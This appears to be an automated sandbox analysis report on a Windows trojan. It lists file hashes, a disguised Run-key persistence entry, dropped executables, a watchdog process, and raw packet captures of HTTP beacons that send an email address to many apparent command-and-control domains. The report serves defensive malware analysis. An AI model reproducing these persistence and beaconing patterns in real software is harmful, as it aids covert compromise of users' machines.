Analysis Date: 2014-09-19 02:34:34

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text   md5: 2eb7ecfb7cf04015158c5aab627b6f29 sha1: 7c63e5105d9f03d60a112d303813f74fe1888638 size: 297984
Section .rdata  md5: d422fe3c12b30907b6043c5bde21cb47 sha1: 3bc36447c85ed6235f9e1d9aeb3934b9c7084597 size: 34304
Section [name not recovered]  md5: 3d9bd0d8b40e0320311be924a1c2501a sha1: 7a4a9941698d0518a1f0e44ff200b173cf9c5557 size: 95744
Timestamp: 2014-07-24 04:47:13
Packer: Microsoft Visual C++ ?.?

Runtime Details:


↳ C:\malware.exe

Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Acquisition Performance Center Background Input ➝ C:\Documents and Settings\Administrator\Application Data\avsvfhobrwfbd\jhdkgcyzzcmf.exe
Creates File: C:\Documents and Settings\Administrator\Application Data\avsvfhobrwfbd\jhdkgcyzzcmf.exe
Creates Process: C:\Documents and Settings\Administrator\Application Data\avsvfhobrwfbd\jhdkgcyzzcmf.exe

↳ C:\Documents and Settings\Administrator\Application Data\avsvfhobrwfbd\jhdkgcyzzcmf.exe

Creates File: C:\Documents and Settings\Administrator\Application Data\avsvfhobrwfbd\jhdkgcyzzcmf.xjo
Creates File: C:\Documents and Settings\Administrator\Application Data\avsvfhobrwfbd\weauwthee.exe
Creates File: \Device\Afd\Endpoint
Creates Process: WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\avsvfhobrwfbd\jhdkgcyzzcmf.exe"

↳ WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\avsvfhobrwfbd\jhdkgcyzzcmf.exe"

Network Details:
DNS queries: 85 × Type: A (queried names not recovered in this extraction)
Flows TCP: 192.168.1.1:1031 ➝ (destination not recovered)
Flows TCP: 192.168.1.1:1032 ➝ (destination not recovered)
Flows TCP: 192.168.1.1:1033 ➝ (destination not recovered)
Flows TCP: 192.168.1.1:1034 ➝ (destination not recovered)
Flows TCP: 192.168.1.1:1035 ➝ (destination not recovered)
Flows TCP: 192.168.1.1:1036 ➝ (destination not recovered)
Flows TCP: 192.168.1.1:1037 ➝ (destination not recovered)
Flows TCP: 192.168.1.1:1038 ➝ (destination not recovered)
Flows TCP: 192.168.1.1:1039 ➝ (destination not recovered)

Raw Pcap
0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d647364 65627261 6c656540   mail=dsdebralee@
0x00000020 (00032)   616f6c2e 636f6d26 6d657468 6f643d70
0x00000030 (00048)   6f737420 48545450 2f312e30 0d0a4163   ost HTTP/1.0..Ac
0x00000040 (00064)   63657074 3a202a2f 2a0d0a43 6f6e6e65   cept: */*..Conne
0x00000050 (00080)   6374696f 6e3a2063 6c6f7365 0d0a486f   ction: close..Ho
0x00000060 (00096)   73743a20 62657474 65727370 6163652e   st: betterspace.
0x00000070 (00112)   6e65740d 0a0d0a                       net....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d647364 65627261 6c656540   mail=dsdebralee@
0x00000020 (00032)   616f6c2e 636f6d26 6d657468 6f643d70
0x00000030 (00048)   6f737420 48545450 2f312e30 0d0a4163   ost HTTP/1.0..Ac
0x00000040 (00064)   63657074 3a202a2f 2a0d0a43 6f6e6e65   cept: */*..Conne
0x00000050 (00080)   6374696f 6e3a2063 6c6f7365 0d0a486f   ction: close..Ho
0x00000060 (00096)   73743a20 67617468 65727370 6163652e   st: gatherspace.
0x00000070 (00112)   6e65740d 0a0d0a                       net....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d647364 65627261 6c656540   mail=dsdebralee@
0x00000020 (00032)   616f6c2e 636f6d26 6d657468 6f643d70
0x00000030 (00048)   6f737420 48545450 2f312e30 0d0a4163   ost HTTP/1.0..Ac
0x00000040 (00064)   63657074 3a202a2f 2a0d0a43 6f6e6e65   cept: */*..Conne
0x00000050 (00080)   6374696f 6e3a2063 6c6f7365 0d0a486f   ction: close..Ho
0x00000060 (00096)   73743a20 71756965 74737061 63652e6e   st: quietspace.n
0x00000070 (00112)   65740d0a 0d0a0a                       et.....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d647364 65627261 6c656540   mail=dsdebralee@
0x00000020 (00032)   616f6c2e 636f6d26 6d657468 6f643d70
0x00000030 (00048)   6f737420 48545450 2f312e30 0d0a4163   ost HTTP/1.0..Ac
0x00000040 (00064)   63657074 3a202a2f 2a0d0a43 6f6e6e65   cept: */*..Conne
0x00000050 (00080)   6374696f 6e3a2063 6c6f7365 0d0a486f   ction: close..Ho
0x00000060 (00096)   73743a20 70726573 656e7462 65696e67   st: presentbeing
0x00000070 (00112)   2e6e6574 0d0a0d0a                     .net....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d647364 65627261 6c656540   mail=dsdebralee@
0x00000020 (00032)   616f6c2e 636f6d26 6d657468 6f643d70
0x00000030 (00048)   6f737420 48545450 2f312e30 0d0a4163   ost HTTP/1.0..Ac
0x00000040 (00064)   63657074 3a202a2f 2a0d0a43 6f6e6e65   cept: */*..Conne
0x00000050 (00080)   6374696f 6e3a2063 6c6f7365 0d0a486f   ction: close..Ho
0x00000060 (00096)   73743a20 63686965 66626569 6e672e6e   st: chiefbeing.n
0x00000070 (00112)   65740d0a 0d0a0d0a                     et......

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d647364 65627261 6c656540   mail=dsdebralee@
0x00000020 (00032)   616f6c2e 636f6d26 6d657468 6f643d70
0x00000030 (00048)   6f737420 48545450 2f312e30 0d0a4163   ost HTTP/1.0..Ac
0x00000040 (00064)   63657074 3a202a2f 2a0d0a43 6f6e6e65   cept: */*..Conne
0x00000050 (00080)   6374696f 6e3a2063 6c6f7365 0d0a486f   ction: close..Ho
0x00000060 (00096)   73743a20 7477656c 7665666f 72657665   st: twelveforeve
0x00000070 (00112)   722e6e65 740d0a0d 0a        

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d647364 65627261 6c656540   mail=dsdebralee@
0x00000020 (00032)   616f6c2e 636f6d26 6d657468 6f643d70
0x00000030 (00048)   6f737420 48545450 2f312e30 0d0a4163   ost HTTP/1.0..Ac
0x00000040 (00064)   63657074 3a202a2f 2a0d0a43 6f6e6e65   cept: */*..Conne
0x00000050 (00080)   6374696f 6e3a2063 6c6f7365 0d0a486f   ction: close..Ho
0x00000060 (00096)   73743a20 68697374 6f727966 6f726576   st: historyforev
0x00000070 (00112)   65722e6e 65740d0a 0d0a      

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d647364 65627261 6c656540   mail=dsdebralee@
0x00000020 (00032)   616f6c2e 636f6d26 6d657468 6f643d70
0x00000030 (00048)   6f737420 48545450 2f312e30 0d0a4163   ost HTTP/1.0..Ac
0x00000040 (00064)   63657074 3a202a2f 2a0d0a43 6f6e6e65   cept: */*..Conne
0x00000050 (00080)   6374696f 6e3a2063 6c6f7365 0d0a486f   ction: close..Ho
0x00000060 (00096)   73743a20 77656174 68657266 6f726576   st: weatherforev
0x00000070 (00112)   65722e6e 65740d0a 0d0a      

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d647364 65627261 6c656540   mail=dsdebralee@
0x00000020 (00032)   616f6c2e 636f6d26 6d657468 6f643d70
0x00000030 (00048)   6f737420 48545450 2f312e30 0d0a4163   ost HTTP/1.0..Ac
0x00000040 (00064)   63657074 3a202a2f 2a0d0a43 6f6e6e65   cept: */*..Conne
0x00000050 (00080)   6374696f 6e3a2063 6c6f7365 0d0a486f   ction: close..Ho
0x00000060 (00096)   73743a20 636c6173 73626579 6f6e642e   st: classbeyond.
0x00000070 (00112)   6e65740d 0a0d0a0a 0d0a                net.......

Strings:

An application has made an attempt to load the C runtime library incorrectly.
- Attempt to initialize the CRT more than once.
- Attempt to use MSIL code from this assembly during native code initialization
bad allocation
bad exception
DOMAIN error
`dynamic atexit destructor for '
`dynamic initializer for '
`eh vector constructor iterator'
`eh vector copy constructor iterator'
`eh vector destructor iterator'
`eh vector vbase constructor iterator'
`eh vector vbase copy constructor iterator'
elogdeyyy rumnaddn gmdaddz vbvab fmjuvcfija bcmaxjho znmos lmesusm lyhabk zoph pcnojgtabs jpsigfqev ssnicectiy vzpourhdix iitp bsogifjsu jfmib mrn rmla fcvoegfp anh nabgeu nxfagbce qivg plf jgici gns wmsituibo zvisuylc nifs grmerl anee bwgujoa cebsezp elg cbluqa atelziag ihmbe jfoxonhpes owq efufsotlb bxd fhpun usfdaa hnyuane ttnadg bilqepccon udvvulm gfzegkc seus fbrenum fjpuub zftelmrai egw vjbicxb fsvicepboi btpunmfe cog yspehmtez lzxamlhelb vslebmu pjy ufr aaxcdod mbcew bnpofzgijg gwutappwu ibodcep fjulubo kjhavknomj cjvorigd zeqogulo rglocncolw lwma tapulamz sznoll fgca rtsoprcu smliongm oiw adryim xenbiuspka rdjoz ameal ajdselfm xnvijudt rwolaoerty jigaj snne wtnihspu plinupdox sxvi enpadeoved vlf qksiljr snveljdon bpzuj qaagneip gsdiumb cuo lciin cbt lnmearduji meetloan pgnupevse yztil najbiddhu gajluisg veaberemvi gcpoicptu eoonia jgqasp cufkicv gazsalmc rumab cpazizbu umapelask zze jdt eaxznalbx ndgohlep fntebjcigb saub ktbigipca ujnrezgfut mmcaii ydjacke nes ngvaslnu obtkag svsaels zbduu cimv cuv mael iqjotigdfa snb vpfeqbnaev pcsojc dwaaaeeca jdga cglipwla gebku jnxejsigud zunlodn tguc mjvubilu opllid dwdudpmut cpi amhbof bfooc sydegjg pbf bbpi fuynahpm rycejoom cjz lzmu vncaghubo bsnad mfji imttaiu cbminedisu ita oochva nghudnixe imlt lsci zfqedci uur nrgig ypf loblaggh wlduqo amiw falqo hvebu uohw zfgil qpluab mcrup pvlomkgui tod ynbi gijdizpdi eiwipyo iiso rfmegjdei cpraalhnap sue tpg iauabms jtd avin aixjguyv yvnupfbacu frm fcm obb ldwij dsnujcjonj ofd nnkivu ksoanulbf acsnax lgace txjeavijri papgozcbef ajf iooaccce ljjabd epi wlrehd anpoli mfpodfdo mvgojzsatp gxdiibmv jdligjac bal uaxnqejsve ncnajgyocb snagenu nvlalgt jrsitslurn vcbadviq lcqo spx gtmepd sllaomloi jsxucvd jgobe prlaksp rzjuhtbul fmre mkculxzado aydyaoj fhfibg gdfe dbe fkmor jvjimn lblikav spiopi erbeo elon bfamad bpxalahu omdjenpi gtezevskuc vbs rcciugue gmrummmuz vob wzgavzo skwajnetuj czpuobfc cfloojuv ogycumfemo gcemiafdqi bdzune bsnilpf amseuc msfomzjes iieedsr sdc gdib odp 
fldiuzqx jwlehssefc cnlu gmdoojew jcuzipje uof bgr pdhinzd kdfouclb edxfucabbo cihpeolob vyyeub
- floating point support not loaded
invalid string position
`local static guard'
`local static thread guard'
`local vftable'
`local vftable constructor closure'
`managed vector constructor iterator'
`managed vector copy constructor iterator'
`managed vector destructor iterator'
Microsoft Visual C++ Runtime Library
- not enough space for arguments
- not enough space for environment
- not enough space for locale information
- not enough space for lowio initialization
- not enough space for _onexit/atexit table
- not enough space for stdio initialization
- not enough space for thread data
`omni callsig'
`placement delete closure'
`placement delete[] closure'
Please contact the application's support team for more information.
<program name unknown>
- pure virtual function call
runtime error 
Runtime Error!
`scalar deleting destructor'
SING error
string too long
This application has requested the Runtime to terminate it in an unusual way.
This indicates a bug in your application.
This indicates a bug in your application. It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain.
!This program cannot be run in DOS mode.
TLOSS error
 Type Descriptor'
`udt returning'
- unable to initialize heap
- unable to open console device
- unexpected heap error
- unexpected multithread lock error
Unknown exception
`vbase destructor'
`vector constructor iterator'
`vector copy constructor iterator'
`vector deleting destructor'
`vector destructor iterator'
`vector vbase constructor iterator'
`vector vbase copy constructor iterator'
`virtual displacement map'
